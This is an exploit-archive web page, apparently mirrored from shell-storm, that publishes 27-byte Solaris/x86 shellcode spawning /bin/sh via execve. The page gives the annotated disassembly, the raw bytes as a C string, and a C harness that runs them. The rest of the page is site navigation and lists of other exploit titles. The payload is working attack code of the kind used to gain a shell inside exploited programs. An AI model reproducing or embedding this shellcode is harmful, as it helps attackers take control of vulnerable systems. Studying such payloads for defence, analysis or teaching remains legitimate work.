首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Solaris/x86 - execve("/bin/sh","/bin/sh",NULL) - 27 bytes
来源:http://www.shell-storm.org 作者:Salwan 发布时间:2010-05-21  

/*
Title:   Solaris/x86 - execve("/bin/sh","/bin/sh",NULL) - 27 bytes
Author:  Jonathan Salwan <submit AT shell-storm.org>
Web:  http://www.shell-storm.org
Twitter: http://twitter.com/shell_storm

Date:  2010-05-19
Tested:  SunOS opensolaris 5.11 snv_111b i86pc i386 i86pc Solaris

section .text
    0x8048074:              31 c0              xorl   %eax,%eax
    0x8048076:              50                 pushl  %eax
    0x8048077:              68 6e 2f 73 68     pushl  $0x68732f6e
    0x804807c:              68 2f 2f 62 69     pushl  $0x69622f2f
    0x8048081:              89 e3              movl   %esp,%ebx
    0x8048083:              50                 pushl  %eax
    0x8048084:              53                 pushl  %ebx
    0x8048085:              89 e2              movl   %esp,%edx
    0x8048087:              50                 pushl  %eax
    0x8048088:              52                 pushl  %edx
    0x8048089:              53                 pushl  %ebx
    0x804808a:              b0 3b              movb   $0x3b,%al
    0x804808c:              50                 pushl  %eax
    0x804808d:              cd 91              int    $0x91

*/


#include <stdio.h>

char sc[] = "\x31\xc0\x50\x68\x6e\x2f"
     "\x73\x68\x68\x2f\x2f\x62"
     "\x69\x89\xe3\x50\x53\x89"
     "\xe2\x50\x52\x53\xb0\x3b"
     "\x50\xcd\x91";

int main(void)
{
        fprintf(stdout,"Length: %d\n",strlen(sc));
 (*(void(*)()) sc)();

return 0;
}

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CommuniCrypt Mail 1.16 (ANSMTP
·ComponentOne VSFlexGrid v. 7 &
·linux/x86 execve("/usr/bin/wge
·Solaris/x86 - Halt shellcode -
·IMEDIA suffers from a remote S
·SyncBack Freeware V3.2.20.0
·Google Chrome 4.1.249.1059 Cro
·QtWeb Browser version 3.3 Dos
·ECShop remote SQL injection ex
·支持serv-u7,8,9本地提权exp
·CompleteFTP Server version 3.3
·Open and Compact FTP server ve
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved